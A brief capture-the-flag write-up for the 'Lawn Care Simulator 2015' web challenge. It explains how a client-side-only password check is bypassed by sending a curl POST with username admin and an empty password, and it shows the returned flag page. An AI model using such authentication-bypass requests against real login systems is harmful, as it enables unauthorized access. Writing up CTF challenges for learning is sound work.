The challenge description was: http://54.165.252.74:8089/

This web challenge was really easy, actually it was so easy that I think it wasn't meant to be that way. When you visit the link you are greeted with the following screen:

Checking for SQL injection wasn't returning anything indicating it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

username:test
password:098f6bcd4621d373cade4e832627b4f6

Trying to log without any password wasn't possible but checked on the client side, so after trying it with curl in a terminal:

mrt$ curl 'http://54.165.252.74:8089/premium.php' --data 'username=admin&password='
<html>
<head>
    <title>Lawn Care Simulator 2015</title>
    <script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<h1>flag{gr0wth__h4ck!nG!1!1!</h1></body>
</html>

We got our flag: flag{gr0wth__h4ck!nG!1!1!}